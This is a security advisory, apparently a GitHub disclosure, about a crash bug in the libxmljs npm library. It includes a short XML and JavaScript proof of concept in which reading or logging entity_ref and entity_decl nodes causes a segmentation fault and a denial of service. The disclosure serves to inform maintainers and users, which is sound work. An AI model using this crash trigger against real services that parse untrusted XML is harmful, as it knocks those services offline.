Original Disclosure on Github

Introduction

I discovered a vulnerability in the libxmljs library, where parsing crafted XML may produce entity_ref and entity_decl nodes that are unsafe to interact with; accessing internal properties on these node triggers a segmentation fault and a crash the program.

Note: While the library is no longer maintained, the vulnerability remains relevant - the package has 261k downloads per month, with 337 dependent packages - https://www.npmjs.com/package/libxmljs

The Vulnerability + PoC

Minimal XML:

<!DOCTYPE note [<!ENTITY writer "X">]>
<from>&writer;</from>

Minimal JS:

doc = libxmljs.parseXml(docText)
from = doc.get('//from')
c = from.childNodes()[0] // entity_ref node

Using Object.getOwnPropertyNames(c) outputs ['_ref']

Accessing this property will create a segmentation fault, like the snippet below:

console.log(c['_ref']);

Alternatively, it can be triggered on childNodes:

c2 = c.childNodes()[0] // entity_decl node

Using Object.getOwnPropertyNames(c2) outputs ['_ref'], and we can trigger a segmentation fault with:

console.log(c2['_ref']);

These are also automatically accessed when performing certain functions, such as logging:

console.log(c); // Causes segmentation fault
console.log(c2); // Causes segmentation fault

Impact

In affected programs, this vulnerability can easily lead to a denial of service by crashing the host process.

However, exploitation requires the program to:

1. Parse untrusted XML using this library
2. Interact with the resulting node objects to reach the affected wrappers

This remains impactful, as the crash can be triggered through generally harmless behaviors during development, such as logging and property inspection. While these types of crashes may be indicative of deeper memory safety issues, I did not validate any exploitation beyond crashing the process.